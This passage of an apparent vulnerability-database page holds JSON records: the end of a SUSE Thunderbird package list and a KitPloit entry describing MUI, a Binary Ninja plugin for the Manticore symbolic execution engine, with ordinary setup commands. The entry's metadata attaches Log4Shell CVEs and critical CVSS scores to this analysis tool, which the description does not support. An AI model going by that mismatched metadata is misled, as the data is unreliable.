&quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;ppc64le&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-translations-common-91.4.0-8.45.2.ppc64le.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird-translations-common&quot;}, {&quot;OS&quot;: &quot;openSUSE Leap&quot;, &quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;s390x&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-translations-common-91.4.0-8.45.2.s390x.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird-translations-common&quot;}, {&quot;OS&quot;: &quot;openSUSE Leap&quot;, &quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;x86_64&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-translations-common-91.4.0-8.45.2.x86_64.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird-translations-common&quot;}, {&quot;OS&quot;: &quot;openSUSE Leap&quot;, &quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;aarch64&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-translations-other-91.4.0-8.45.2.aarch64.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird-translations-other&quot;}, {&quot;OS&quot;: &quot;openSUSE Leap&quot;, &quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;ppc64le&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-translations-other-91.4.0-8.45.2.ppc64le.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird-translations-other&quot;}, {&quot;OS&quot;: &quot;openSUSE Leap&quot;, &quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;s390x&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-translations-other-91.4.0-8.45.2.s390x.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird-translations-other&quot;}, {&quot;OS&quot;: &quot;openSUSE Leap&quot;, &quot;OSVersion&quot;: &quot;15.3&quot;, &quot;arch&quot;: &quot;x86_64&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;packageVersion&quot;: &quot;91.4.0-8.45.2&quot;, &quot;packageFilename&quot;: &quot;MozillaThunderbird-translations-other-91.4.0-8.45.2.x86_64.rpm&quot;, &quot;packageName&quot;: &quot;mozillathunderbird-translations-other&quot;}], &quot;_object_type&quot;: &quot;robots.models.suse.SuseBulletin&quot;, &quot;_object_types&quot;: [&quot;robots.models.suse.SuseBulletin&quot;, &quot;robots.models.base.Bulletin&quot;]}], &quot;kitploit&quot;: [{&quot;id&quot;: &quot;KITPLOIT:1329899062177275691&quot;, &quot;bulletinFamily&quot;: &quot;tools&quot;, &quot;title&quot;: &quot;MUI - A GUI Plugin For Binary Ninja To Easily Interact With And View The Progress Of Manticore&quot;, &quot;description&quot;: &quot;[ ![](https://blogger.googleusercontent.com/img/a/AVvXsEg2ezs221jpWWNUGVLxuK7bx_jP-RbT-XsGXFPqIZCKBQTn_1lFXrsh5Jjg6cL8UmY_S98aqFAqeLsUc42v3KHJqQ76xRZuftgQq1PBMi7AsYcH9aU9s2U4vhKysBt9a3Y4K_93ZwJ20pn2zFGS2EJSV5JzlH2EwilL5lsx0OM-yZ2PEl09VAIzneysvw) ](&lt;https://blogger.googleusercontent.com/img/a/AVvXsEg2ezs221jpWWNUGVLxuK7bx_jP-RbT-XsGXFPqIZCKBQTn_1lFXrsh5Jjg6cL8UmY_S98aqFAqeLsUc42v3KHJqQ76xRZuftgQq1PBMi7AsYcH9aU9s2U4vhKysBt9a3Y4K_93ZwJ20pn2zFGS2EJSV5JzlH2EwilL5lsx0OM-yZ2PEl09VAIzneysvw=s256&gt;)\n\n  \n\n\nWith the [ Manticore ](&lt;https://www.kitploit.com/search/label/Manticore&gt; \&quot;Manticore\&quot; ) User Interface (MUI) project, we provide a graphical user interface plugin for [ Binary Ninja ](&lt;https://binary.ninja/&gt; \&quot;Binary Ninja\&quot; ) to allow users to easily interact with and view progress of the [ Manticore ](&lt;https://github.com/trailofbits/manticore&gt; \&quot;Manticore\&quot; ) [ symbolic execution ](&lt;https://www.kitploit.com/search/label/Symbolic%20Execution&gt; \&quot;symbolic execution\&quot; ) engine for [ analysis ](&lt;https://www.kitploit.com/search/label/Analysis&gt; \&quot;analysis\&quot; ) of [ smart contracts ](&lt;https://www.kitploit.com/search/label/Smart%20Contracts&gt; \&quot;smart contracts\&quot; ) and native binaries. \n\n  \n\n\nATTENTION \n\n  \n\n\nThis project is under active development and may be unstable or unusable. Please open an issue if you have any difficulties using the existing features. New feature development will be considered on a case by case basis. \n\n##  Requirements \n\nAside from the Python requirements, we require the following: \n\n  * Binary Ninja (latest development version) with GUI \n  * ` git submodule update --init --recursive ` for Manticore submodule \n\n##  Installation \n\nMUI requires a copy of Binary Ninja with a GUI. Currently we are testing against the latest ` dev ` release(s) ( ` 2.4.2901-dev ` at time of writing). \n\nManticore only operates on native binaries within a Linux environment. EVM support has only been tested on Mac and Linux, and it requires the installation of [ ethersplay ](&lt;https://github.com/crytic/ethersplay&gt; \&quot;ethersplay\&quot; ) . \n\nPython dependencies are currently managed using ` requirements.txt ` and ` requirements-dev.txt ` . You can run ` make init ` to set up a development environment. \n\n  1. Make the project available to Binary Ninja by creating a symbolic link to the plugins directory. From within the root of this repo, run the following: \n    \n        # For Mac  \n    $ ln -s \&quot;$(pwd)/mui\&quot; \&quot;${HOME}/Library/Application Support/Binary Ninja/plugins/mui\&quot;  \n      \n    # For Linux  \n    $ ln -s \&quot;$(pwd)/mui\&quot; \&quot;${HOME}/.binaryninja/plugins/mui\&quot;  \n    \n\n  2. Make sure Binary Ninja knows about our Python virtual environment. \n\n    1. Open Binary Ninja&#x27;s \&quot;Preferences\&quot; -&amp;gt; \&quot;Settings\&quot; -&amp;gt; \&quot;Python\&quot; and ensure the \&quot;Python Interpreter\&quot; is correctly set to the Python path associated with the current virtual environment. Reference ` venv/pyvenv.cfg ` to find the base path. \n    2. Copy and paste the absolute path of the MUI project into Binary Ninja&#x27;s \&quot;Python Virtual Environment Site-Packages\&quot; and add the required ` /venv/lib/python3.&lt;minor_version&gt;/site-packages ` suffix for the site-packages path. \n    3. Restart Binary Ninja if necessary. \n\n##  Development \n\nInstalling currently listed dependencies: \n    \n    \n    $ make init  \n    # For Mac (will be similar for Linux)  \n    $ export PYTHONPATH=\&quot;/Applications/Binary Ninja.app/Contents/Resources/python:/Applications/Binary Ninja.app/Contents/Resources/python3\&quot;  \n    \n\nActivating the python virtual environment (do this before running other make commands): \n    \n    \n    $ . venv/bin/activate  \n    \n\nCode style and linting can be followed by running the following: \n    \n    \n    $ make format  \n    $ make lint  \n    \n\nTests for code without Binary Ninja interaction can be run if you have a headless version of binary ninja available, otherwise only non-Binary Ninja tests will be run: \n    \n    \n    $ make test  \n    \n\nAdding a new dependency can be done by editing ` requirements.txt ` or ` requirements-dev.txt ` and then running the following in the virtual environment: \n    \n    \n    $ pip install -r requirements-dev.txt -r requirements.txt  \n    \n\n##  Usage (Native) \n\nAll MUI features can be accessed through either the right-click context menu or the command palette. Common features include: \n\n  * Find Path to This Instruction / Remove Instruction from Find List \n  * Avoid This Instruction / Remove Instruction from Avoid List \n  * Add/Edit Custom Hook \n  * Solve With Manticore / Stop Manticore \n\nAnd the following widgets are available: \n\n  * State List Widget \n\n&gt; Shows all the Active/Waiting/Complete/Errored states during manticore execution. Double-clicking a certain state navigates you to the current instruction of that state and renders its provenance tree in the graph widget. \n\n  \n\n\n[ ![](https://blogger.googleusercontent.com/img/a/AVvXsEg0yuYVzMf8llM-9a8oLf1FlR280-TAfSBZaIWOdh6gX9fUTZVxq0z8WZf7v2FPR0tMyLXbkA0JQ-hVhj0M_3dEtuEN2PwkqyoWKJf0lfZYRO1tDRMAHtBUp-coHdu6aT5CDA5WSkEUjcg72uGmdMNFiJmLHneHuU2firaNp1TXFI_UUTBuc90fuVQ8rg=w640-h526) ](&lt;https://blogger.googleusercontent.com/img/a/AVvXsEg0yuYVzMf8llM-9a8oLf1FlR280-TAfSBZaIWOdh6gX9fUTZVxq0z8WZf7v2FPR0tMyLXbkA0JQ-hVhj0M_3dEtuEN2PwkqyoWKJf0lfZYRO1tDRMAHtBUp-coHdu6aT5CDA5WSkEUjcg72uGmdMNFiJmLHneHuU2firaNp1TXFI_UUTBuc90fuVQ8rg=s1748&gt;)\n\n  * State Graph Widget \n\n&gt; Shows the provenance tree for a certain state selected in the list widget. ` Tab ` can be used to expand/collapse the graph and double-clicking any of the state nodes navigates you to the current instruction of that state. \n\n  \n\n\n[ ![](https://blogger.googleusercontent.com/img/a/AVvXsEhWZOaoxLchNS6QnYo-3AfltFXIogNe1yb11BRJQ7Hd1QXuPrERY2445nZboQiPVIjBidedQkCvD2qzi4saaS7FMTWqgCyXOiGQ2k8kpLzW9hQ-sZQUryLquGii7NookJggoQw_V3ZMXIHJYv1PFS5Na7Wrs6JraOZeFMHRgR0xY0CzufuJumbC9B40qw=w640-h396) ](&lt;https://blogger.googleusercontent.com/img/a/AVvXsEhWZOaoxLchNS6QnYo-3AfltFXIogNe1yb11BRJQ7Hd1QXuPrERY2445nZboQiPVIjBidedQkCvD2qzi4saaS7FMTWqgCyXOiGQ2k8kpLzW9hQ-sZQUryLquGii7NookJggoQw_V3ZMXIHJYv1PFS5Na7Wrs6JraOZeFMHRgR0xY0CzufuJumbC9B40qw=s2838&gt;)\n\n  \n\n\n  * Run Dialog \n\n&gt; The run dialog is shown when you invoke the ` Solve with Manticore ` command. It allows you to configure the various manticore options, and the changes will be saved to the ` bndb ` file. Some example configs include using a combination of ` LD_PRELOAD ` and ` LD_LIBRARY_PATH ` environment variables to run the binary with custom glibc. \n\n  \n\n\n[ ![](https://blogger.googleusercontent.com/img/a/AVvXsEjDeat3FYnidvrdwfuHZ5rWBG0EredkhMRhN05du4cZG1RsLIaMqsDFYaEPWwOcmuuLu24FAf0GOs5loRJRi-pF-VBXI97IpFTHAAYft6cuwc1E9htkNOsWDRxntmq-gOmvP4l_fEG3lI3umkUDYp6eeSnQM17uAWxzf7MfbY_cYO6iHJtN8i4JP0Hxtw=w640-h420) ](&lt;https://blogger.googleusercontent.com/img/a/AVvXsEjDeat3FYnidvrdwfuHZ5rWBG0EredkhMRhN05du4cZG1RsLIaMqsDFYaEPWwOcmuuLu24FAf0GOs5loRJRi-pF-VBXI97IpFTHAAYft6cuwc1E9htkNOsWDRxntmq-gOmvP4l_fEG3lI3umkUDYp6eeSnQM17uAWxzf7MfbY_cYO6iHJtN8i4JP0Hxtw=s1874&gt;)\n\n  * Custom Hook Dialog \n\n&gt; The custom hook dialog can be accessed using the ` Add/Edit Custom Hook ` command. It allows you to define a custom manticore hook at the selected address. You also have full access to the Binary Ninja API which allows you to add highlighting, comments, and more. A defined hook can be removed by setting the code input field to blank. \n\n  \n\n\n[ ![](https://blogger.googleusercontent.com/img/a/AVvXsEgZvgkXjWJToyvTlHZhteMn1ximN_vPy12o8k2TbzzOXq3TlnkRFV5pn9NBrGM-f1PWYOeMeSw_bp8bIPa-7eUBXUDvUut4enmaSOEDAsjhC7925jyUfqdL0DpLmrGMbzO2nD1ND2np3Y_IfVVb-Dkg60tLwB-hnaQafcknkILcsNKm6wY2Lvg5-Qx_Dg=w640-h356) ](&lt;https://blogger.googleusercontent.com/img/a/AVvXsEgZvgkXjWJToyvTlHZhteMn1ximN_vPy12o8k2TbzzOXq3TlnkRFV5pn9NBrGM-f1PWYOeMeSw_bp8bIPa-7eUBXUDvUut4enmaSOEDAsjhC7925jyUfqdL0DpLmrGMbzO2nD1ND2np3Y_IfVVb-Dkg60tLwB-hnaQafcknkILcsNKm6wY2Lvg5-Qx_Dg=s1424&gt;)\n\n  \n\n\n##  Usage (EVM) \n\nEVM support is currently a bit limited. MUI EVM only supports the same feature set as the [ Manticore CLI tool ](&lt;https://github.com/trailofbits/manticore&gt; \&quot;Manticore CLI tool\&quot; ) . Available commands include: \n\n  * Load [ Ethereum ](&lt;https://www.kitploit.com/search/label/Ethereum&gt; \&quot;Ethereum\&quot; ) Contract \n  * Solve With Manticore / Stop Manticore \n\nAnd the following views are implemented: \n\n  * EVM Run Dialog \n\n&gt; The run dialog is shown when you invoke the ` Solve with Manticore ` command. It allows you to configure the various manticore options, and the changes will be saved to the ` bndb ` file. \n\n  \n\n\n[ ![](https://blogger.googleusercontent.com/img/a/AVvXsEj3smvjWLXOFv8Q2mPNboa-B3ld36y3she1aVmymbUBavq46T0_z0s7MnKMYexWpPyX0RJ5eJFVygn5_4TNMCDz_kYRwKx3IfI_y59LiWrURbfGtfJ5jY6496vFhtBhPPjilQyKgXAGXRAkpHnnFTaNmPz4HmFtaVE1sPgxduMUn6gtOPCsZ4rDU0nxPw=w640-h466) ](&lt;https://blogger.googleusercontent.com/img/a/AVvXsEj3smvjWLXOFv8Q2mPNboa-B3ld36y3she1aVmymbUBavq46T0_z0s7MnKMYexWpPyX0RJ5eJFVygn5_4TNMCDz_kYRwKx3IfI_y59LiWrURbfGtfJ5jY6496vFhtBhPPjilQyKgXAGXRAkpHnnFTaNmPz4HmFtaVE1sPgxduMUn6gtOPCsZ4rDU0nxPw=s2196&gt;)\n\n  \n\n\n  * Run Report \n\n&gt; The report page shows the result of a manticore execution. It displays all the files produced using the Binary Ninja UI. \n\n  \n\n\n[ ![](https://blogger.googleusercontent.com/img/a/AVvXsEhTEFkt1tuHBOduMURN2EJUK9R9_40vBjVHMFv2LLMyYpIrn424p1nnCxK_hDOyYPByCOlL8_XIxIrujhacPsYIdEHkn9Qji3DE0dUqKyn1vp8j44I0rgGGnonCFMpJQcd4EzH-Jj-voZhm4sKsxA3WUvrL5ok5KKSqkFXQCu9HC74dxaaitGpsG9NPKA=w640-h419) ](&lt;https://blogger.googleusercontent.com/img/a/AVvXsEhTEFkt1tuHBOduMURN2EJUK9R9_40vBjVHMFv2LLMyYpIrn424p1nnCxK_hDOyYPByCOlL8_XIxIrujhacPsYIdEHkn9Qji3DE0dUqKyn1vp8j44I0rgGGnonCFMpJQcd4EzH-Jj-voZhm4sKsxA3WUvrL5ok5KKSqkFXQCu9HC74dxaaitGpsG9NPKA=s3016&gt;)\n\n  \n\n\n** [ Download MUI ](&lt;https://github.com/trailofbits/MUI&gt; \&quot;Download MUI\&quot; ) **\n&quot;, &quot;published&quot;: &quot;2021-12-22T11:30:00&quot;, &quot;modified&quot;: &quot;2021-12-22T11:30:00&quot;, &quot;cvss&quot;: {&quot;score&quot;: 9.3, &quot;vector&quot;: &quot;AV:N/AC:M/Au:N/C:C/I:C/A:C&quot;}, &quot;cvss2&quot;: {&quot;acInsufInfo&quot;: false, &quot;cvssV2&quot;: {&quot;accessComplexity&quot;: &quot;MEDIUM&quot;, &quot;accessVector&quot;: &quot;NETWORK&quot;, &quot;authentication&quot;: &quot;NONE&quot;, &quot;availabilityImpact&quot;: &quot;COMPLETE&quot;, &quot;baseScore&quot;: 9.3, &quot;confidentialityImpact&quot;: &quot;COMPLETE&quot;, &quot;integrityImpact&quot;: &quot;COMPLETE&quot;, &quot;vectorString&quot;: &quot;AV:N/AC:M/Au:N/C:C/I:C/A:C&quot;, &quot;version&quot;: &quot;2.0&quot;}, &quot;exploitabilityScore&quot;: 8.6, &quot;impactScore&quot;: 10.0, &quot;obtainAllPrivilege&quot;: false, &quot;obtainOtherPrivilege&quot;: false, &quot;obtainUserPrivilege&quot;: false, &quot;severity&quot;: &quot;HIGH&quot;, &quot;userInteractionRequired&quot;: false}, &quot;cvss3&quot;: {&quot;cvssV3&quot;: {&quot;attackComplexity&quot;: &quot;LOW&quot;, &quot;attackVector&quot;: &quot;NETWORK&quot;, &quot;availabilityImpact&quot;: &quot;HIGH&quot;, &quot;baseScore&quot;: 10.0, &quot;baseSeverity&quot;: &quot;CRITICAL&quot;, &quot;confidentialityImpact&quot;: &quot;HIGH&quot;, &quot;integrityImpact&quot;: &quot;HIGH&quot;, &quot;privilegesRequired&quot;: &quot;NONE&quot;, &quot;scope&quot;: &quot;CHANGED&quot;, &quot;userInteraction&quot;: &quot;NONE&quot;, &quot;vectorString&quot;: &quot;CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H&quot;, &quot;version&quot;: &quot;3.1&quot;}, &quot;exploitabilityScore&quot;: 3.9, &quot;impactScore&quot;: 6.0}, &quot;href&quot;: &quot;http://www.kitploit.com/2021/12/mui-gui-plugin-for-binary-ninja-to.html&quot;, &quot;reporter&quot;: &quot;KitPloit&quot;, &quot;references&quot;: [&quot;https://github.com/trailofbits/MUI&quot;, &quot;https://github.com/crytic/ethersplay&quot;, &quot;https://github.com/trailofbits/manticore&quot;], &quot;cvelist&quot;: [&quot;CVE-2021-44228&quot;, &quot;CVE-2021-45046&quot;], &quot;immutableFields&quot;: [], &quot;type&quot;: &quot;kitploit&quot;, &quot;lastseen&quot;: &quot;2021-12-22T16:45:10&quot;, &quot;history&quot;: [], &quot;edition&quot;: 1, &quot;hashmap&quot;: [{&quot;key&quot;: &quot;bulletinFamily&quot;, &quot;hash&quot;: &quot;4a931512ce65bdc9ca6808adf92d8783&quot;}, {&quot;key&quot;: &quot;cvelist&quot;, &quot;hash&quot;: &quot;f17b90fe31c84d141b80ef80d4eb6683&quot;}, {&quot;key&quot;: &quot;cvss&quot;, &quot;hash&quot;: &quot;d726e774add6189e33cf2ea0c61a2ba5&quot;}, {&quot;key&quot;: &quot;cvss2&quot;, &quot;hash&quot;: &quot;9acfcf14cfd828b910139bef8de6f4f5&quot;}, {&quot;key&quot;: &quot;cvss3&quot;, &quot;hash&quot;: &quot;8d437ae6a862439c46e052dbf684d496&quot;}, {&quot;key&quot;: &quot;description&quot;, &quot;hash&quot;: &quot;a1ab26ee31eae346d0f4cfe033e63ddf&quot;}, {&quot;key&quot;: &quot;href&quot;, &quot;hash&quot;: &quot;1f67fdc3d46c1c9cc90c7700d2bc1cf2&quot;}, {&quot;key&quot;: &quot;immutableFields&quot;, &quot;hash&quot;: &quot;d41d8cd98f00b204e9800998ecf8427e&quot;}, {&quot;key&quot;: &quot;modified&quot;, &quot;hash&quot;: &quot;cbd0b66508fe44898b7987dcff8dcb83&quot;}, {&quot;key&quot;: &quot;published&quot;, &quot;hash&quot;: &quot;cbd0b66508fe44898b7987dcff8dcb83&quot;}, {&quot;key&quot;: &quot;references&quot;, &quot;hash&quot;: &quot;6624cdc6d2dfb9d43c24002ea641c750&quot;}, {&quot;key&quot;: &quot;reporter&quot;, &quot;hash&quot;: &quot;aba454e3574969396c0dddcb45011dcc&quot;}, {&quot;key&quot;: &quot;title&quot;, &quot;hash&quot;: &quot;49280fd1e6e635b3d834e70df82cd7cb&quot;}, {&quot;key&quot;: &quot;toolHref&quot;, &quot;hash&quot;: &quot;2b5c50cf91bbf8f4cc867020976b93a5&quot;}, {&quot;key&quot;: &quot;type&quot;, &quot;hash&quot;: &quot;4553be2119d862322dd6fec6bb385401&quot;}], &quot;hash&quot;: &quot;49ba9e102bd51928387bf7efcbc7b62a8012c6e2731d601dce6ff1377f34e45b&quot;, &quot;viewCount&quot;: 0, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;checkpoint_advisories&quot;, &quot;idList&quot;: [&quot;CPAI-2021-0936&quot;]}, {&quot;type&quot;: &quot;redhatcve&quot;, &quot;idList&quot;: [&quot;RH:CVE-2021-45046&quot;, &quot;RH:CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;attackerkb&quot;, &quot;idList&quot;: [&quot;AKB:398CAD69-31E4-4276-B510-D93B2C648A74&quot;, &quot;AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94&quot;]}, {&quot;type&quot;: &quot;vmware&quot;, &quot;idList&quot;: [&quot;VMSA-2021-0028.1&quot;, &quot;VMSA-2021-0028.3&quot;, &quot;VMSA-2021-0028.4&quot;, &quot;VMSA-2021-0028.7&quot;, &quot;VMSA-2021-0028.6&quot;, &quot;VMSA-2021-0028.2&quot;]}, {&quot;type&quot;: &quot;citrix&quot;, &quot;idList&quot;: [&quot;CTX335705&quot;]}, {&quot;type&quot;: &quot;paloalto&quot;, &quot;idList&quot;: [&quot;PA-CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;kitploit&quot;, &quot;idList&quot;: [&quot;KITPLOIT:862813876577193966&quot;, &quot;KITPLOIT:6850731326084324669&quot;, &quot;KITPLOIT:7907951800535343298&quot;, &quot;KITPLOIT:1968602182515115746&quot;, &quot;KITPLOIT:612056601827302693&quot;, &quot;KITPLOIT:3291043683476358730&quot;, &quot;KITPLOIT:3265043889693258675&quot;, &quot;KITPLOIT:7751588580935980451&quot;, &quot;KITPLOIT:7930775267505129746&quot;, &quot;KITPLOIT:8768868102969454497&quot;, &quot;KITPLOIT:5731986104273962994&quot;, &quot;KITPLOIT:8221768243357868169&quot;, &quot;KITPLOIT:6893598659669876269&quot;, &quot;KITPLOIT:3144734278239501273&quot;, &quot;KITPLOIT:3979993128382390106&quot;, &quot;KITPLOIT:8861085596549853812&quot;, &quot;KITPLOIT:766358496917543765&quot;, &quot;KITPLOIT:8822525856694794539&quot;, &quot;KITPLOIT:713073119892727497&quot;, &quot;KITPLOIT:6944158845504210759&quot;, &quot;KITPLOIT:6759391622067035795&quot;, &quot;KITPLOIT:7380705835642911918&quot;]}, {&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-45046&quot;, &quot;UB:CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;debiancve&quot;, &quot;idList&quot;: [&quot;DEBIANCVE:CVE-2021-44228&quot;, &quot;DEBIANCVE:CVE-2021-45046&quot;]}, {&quot;type&quot;: &quot;cve&quot;, &quot;idList&quot;: [&quot;CVE-2021-45046&quot;, &quot;CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;securelist&quot;, &quot;idList&quot;: [&quot;SECURELIST:7A375F44156FACA25A0B3990F2CD73C1&quot;]}, {&quot;type&quot;: &quot;github&quot;, &quot;idList&quot;: [&quot;GITHUB:070AFCDE1A9C584654244E41373D86D8&quot;]}, {&quot;type&quot;: &quot;thn&quot;, &quot;idList&quot;: [&quot;THN:602D65D576B090BAC4B0C96998F8F922&quot;]}, {&quot;type&quot;: &quot;typo3&quot;, &quot;idList&quot;: [&quot;TYPO3-PSA-2021-004&quot;]}, {&quot;type&quot;: &quot;f5&quot;, &quot;idList&quot;: [&quot;F5:K19026212&quot;, &quot;F5:K32171392&quot;]}, {&quot;type&quot;: &quot;ibm&quot;, &quot;idList&quot;: [&quot;11FEAADF6A94DFB6615A82EE0023D346C418ECD114C445A6BA52D50AA2C6FE0B&quot;, &quot;1629CA1DFD389EEFF25556E8C9B707086E571E474449820E949D944C6EB994C3&quot;, &quot;08493CBA8B1A8F34C7786760C52C7997B8AE1C300A4CD3A03EEF9B528175E0E6&quot;, &quot;9D675243F41B597AEE7EC01ACEA307E5B73DA85724CE286F50180E2EF0DDC2E8&quot;, &quot;BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423&quot;, &quot;CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67&quot;, &quot;23532FC7488A1E0A5525D86FA8B58841ED6086B69C02A7FBB104B3F98E2ED3CE&quot;, &quot;8FA41F50A028003D6689B034A6CA3E840361D121B9F4B4350B17EAB4605438C4&quot;, &quot;78F199BD0B7C851B9B51668C7C03C7066EA862D4D07B5141F8116EE923472533&quot;, &quot;E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902&quot;, &quot;B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA&quot;, &quot;18A5E6C2581806177DE446AE26FCBC2EBB616C29B40041253F318FF51CE1AFB5&quot;, &quot;7E846C52FF7D26445DCFC4472B6BC7E4EEADFD45513EDDFC6C395E9B800F576B&quot;, &quot;53D2631E5E76894870663A2B4948D3A4F72BDEEDF8C87935B788F981BEE5852B&quot;, &quot;4271B86469CFCE465E783BEC3C9F3EDD13D645F55A5BEB697F3A4FCF694E568B&quot;, &quot;6FCF3A6897C9A1A085633762339E7EC8DFE631B6D2A160FA5D1ADBC3E11F92E1&quot;, &quot;EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B&quot;, &quot;8191B5D601C7F186266C65C8DC79A0B94EDA45737524796672F9272DD3278F4E&quot;, &quot;D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20&quot;, &quot;53949D71EE0D6BBA6C433F4DE402EC6D1ED7AA7877C8B84C15AD5E27FFEBE24E&quot;, &quot;8968C94B71BE086C952CFA8BF1B1924C1CF6FFECA8B8864B828E68AABA1D96E8&quot;, &quot;ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC&quot;, &quot;519FF26BE329CC59BFF47E2AAC0D4B73FCA35BCF836D736A007D121863323E8C&quot;, &quot;9D21714C8A46FFA3AB195D14E14C9E6854AE7C8D7E68CC48DA42B63AB322B14A&quot;]}, {&quot;type&quot;: &quot;rst&quot;, &quot;idList&quot;: [&quot;RST:88DC31E6-A134-3949-9AF5-51E25878A894&quot;, &quot;RST:4B2296DE-AF2D-3763-8B79-92DE43775C59&quot;, &quot;RST:9A0665BB-4202-38BD-A548-1C0EEC9498C9&quot;, &quot;RST:C857CD75-26C6-3F83-8C9E-226118527715&quot;, &quot;RST:D86EFFA9-3107-38D5-A9C0-D3CBF091E39D&quot;, &quot;RST:06FFD918-46C2-3F1B-A100-A53CD8C0E7CD&quot;]}, {&quot;type&quot;: &quot;qualysblog&quot;, &quot;idList&quot;: [&quot;QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F&quot;, &quot;QUALYSBLOG:42335884011D582222F08AEF81D70B94&quot;]}, {&quot;type&quot;: &quot;githubexploit&quot;, &quot;idList&quot;: [&quot;780AD920-FF08-55C6-84C8-A8536C6F5527&quot;, &quot;7BCC0C24-A1F7-531E-B1BA-342D21C9AF02&quot;, &quot;CA625124-9F92-5FCF-83A7-3ECF5F0EBBFB&quot;, &quot;8F362564-1631-5AF9-BB38-D1BFC4678DAE&quot;]}, {&quot;type&quot;: &quot;rapid7blog&quot;, &quot;idList&quot;: [&quot;RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E&quot;, &quot;RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46&quot;]}, {&quot;type&quot;: &quot;wallarmlab&quot;, &quot;idList&quot;: [&quot;WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB&quot;, &quot;WALLARMLAB:060FBB90648BCDE11554492408AE89C8&quot;, &quot;WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884&quot;]}, {&quot;type&quot;: &quot;nessus&quot;, &quot;idList&quot;: [&quot;VMWARE_VCENTER_LOG4SHELL.NBIN&quot;, &quot;APACHE_LOG4SHELL_CVE-2021-45056_DIRECT_CHECK.NBIN&quot;]}, {&quot;type&quot;: &quot;impervablog&quot;, &quot;idList&quot;: [&quot;IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2&quot;, &quot;IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E&quot;, &quot;IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71&quot;]}, {&quot;type&quot;: &quot;msrc&quot;, &quot;idList&quot;: [&quot;MSRC:543F3A129A47F4B14FB170389908717B&quot;]}, {&quot;type&quot;: &quot;cisa&quot;, &quot;idList&quot;: [&quot;CISA:8367DA0C1A6F51FB2D817745BB204C48&quot;]}, {&quot;type&quot;: &quot;cloudfoundry&quot;, &quot;idList&quot;: [&quot;CFOUNDRY:690C01663F820378948F8CF2E2405F72&quot;]}, {&quot;type&quot;: &quot;qt&quot;, &quot;idList&quot;: [&quot;QT:7EFAEDCED59EA2EE3AB98A0A484C5825&quot;]}, {&quot;type&quot;: &quot;akamaiblog&quot;, &quot;idList&quot;: [&quot;AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D&quot;, &quot;AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F&quot;]}, {&quot;type&quot;: &quot;ubuntu&quot;, &quot;idList&quot;: [&quot;USN-5197-1&quot;]}], &quot;modified&quot;: &quot;2021-12-22T16:45:10&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 4.5, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-22T16:45:10&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;toolHref&quot;: &quot;https://github.com/trailofbits/MUI&quot;}]}
    </div>


<script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Organization",
        "url": "https://vulners.com",
        "logo": "https://vulners.com/static/img/logo.png",
        "contactPoint": [
            { "@type": "ContactPoint",
